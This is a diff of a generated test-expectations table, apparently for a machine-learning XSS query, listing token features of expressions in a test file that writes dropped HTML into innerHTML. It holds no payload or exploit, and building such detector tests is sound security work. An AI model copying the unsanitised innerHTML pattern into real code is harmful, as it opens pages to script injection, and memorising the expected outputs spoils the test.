dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:42:71:48 | getData | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:42:71:48 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:50:71:60 | 'text/html' | CalleeFlexibleAccessPath | e.dataTransfer.getData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:50:71:60 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:50:71:60 | 'text/html' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13593,6 +101014,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:50:71:60 | 'text/html' | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:50:71:60 | 'text/html' | enclosingFunctionName | getDropData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:71:50:71:60 | 'text/html' | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:21 | container | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:21 | container | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:21 | container | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:21 | container | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:21 | container | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:54 | contain ... 'html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:54 | contain ... 'html') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:54 | contain ... 'html') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:54 | contain ... 'html') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:54 | contain ... 'html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:54 | container | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:54 | container | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:54 | container | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:54 | container | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:13:72:54 | container | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:32 | document | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:32 | document | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:32 | document | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:32 | document | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:32 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:46 | documen ... Element | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:46 | documen ... Element | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:46 | documen ... Element | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:46 | documen ... Element | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:46 | documen ... Element | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:54 | documen ... 'html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:54 | documen ... 'html') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:54 | documen ... 'html') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:54 | documen ... 'html') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:54 | documen ... 'html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:54 | exceptional return of documen ... 'html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:54 | exceptional return of documen ... 'html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:54 | exceptional return of documen ... 'html') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:54 | exceptional return of documen ... 'html') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:25:72:54 | exceptional return of documen ... 'html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:34:72:46 | createElement | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:34:72:46 | createElement | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:34:72:46 | createElement | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:34:72:46 | createElement | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:34:72:46 | createElement | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:48:72:53 | 'html' | CalleeFlexibleAccessPath | document.createElement | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:48:72:53 | 'html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:48:72:53 | 'html' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13601,12 +101062,72 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:48:72:53 | 'html' | enclosingFunctionName | getDropData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:48:72:53 | 'html' | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:72:48:72:53 | 'html' | receiverName | document | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:15 | container | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:15 | container | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:15 | container | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:15 | container | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:15 | container | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:25 | container.innerHTML | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:25 | container.innerHTML | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:25 | container.innerHTML | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:25 | container.innerHTML | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:25 | container.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:39 | contain ... pedHtml | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:39 | contain ... pedHtml | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:39 | contain ... pedHtml | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:39 | contain ... pedHtml | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:7:73:39 | contain ... pedHtml | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:17:73:25 | innerHTML | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:17:73:25 | innerHTML | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:17:73:25 | innerHTML | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:17:73:25 | innerHTML | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:17:73:25 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:29:73:39 | droppedHtml | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:29:73:39 | droppedHtml | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:29:73:39 | droppedHtml | contextSurroundingFunctionParameters | (e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:29:73:39 | droppedHtml | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:29:73:39 | droppedHtml | enclosingFunctionName | getDropData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:73:29:73:39 | droppedHtml | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:16 | imgs | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:16 | imgs | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:16 | imgs | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:16 | imgs | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:16 | imgs | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:56 | imgs | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:56 | imgs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:56 | imgs | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:56 | imgs | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:56 | imgs | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:56 | imgs = ... ('img') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:56 | imgs = ... ('img') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:56 | imgs = ... ('img') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:56 | imgs = ... ('img') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:13:74:56 | imgs = ... ('img') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:28 | container | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:28 | container | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:28 | container | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:28 | container | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:28 | container | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:49 | contain ... TagName | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:49 | contain ... TagName | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:49 | contain ... TagName | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:49 | contain ... TagName | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:49 | contain ... TagName | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:56 | contain ... ('img') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:56 | contain ... ('img') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:56 | contain ... ('img') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:56 | contain ... ('img') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:56 | contain ... ('img') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:56 | exceptional return of contain ... ('img') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:56 | exceptional return of contain ... ('img') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:56 | exceptional return of contain ... ('img') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:56 | exceptional return of contain ... ('img') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:20:74:56 | exceptional return of contain ... ('img') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:30:74:49 | getElementsByTagName | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:30:74:49 | getElementsByTagName | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:30:74:49 | getElementsByTagName | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:30:74:49 | getElementsByTagName | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:30:74:49 | getElementsByTagName | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:51:74:55 | 'img' | CalleeFlexibleAccessPath | container.getElementsByTagName | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:51:74:55 | 'img' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:51:74:55 | 'img' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13615,6 +101136,96 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:51:74:55 | 'img' | enclosingFunctionName | getDropData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:51:74:55 | 'img' | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:74:51:74:55 | 'img' | receiverName | container | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:14 | imgs | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:14 | imgs | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:14 | imgs | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:14 | imgs | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:14 | imgs | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:21 | imgs.length | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:21 | imgs.length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:21 | imgs.length | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:21 | imgs.length | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:21 | imgs.length | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:27 | imgs.length === 1 | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:27 | imgs.length === 1 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:27 | imgs.length === 1 | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:27 | imgs.length === 1 | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:11:75:27 | imgs.length === 1 | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:16:75:21 | length | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:16:75:21 | length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:16:75:21 | length | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test 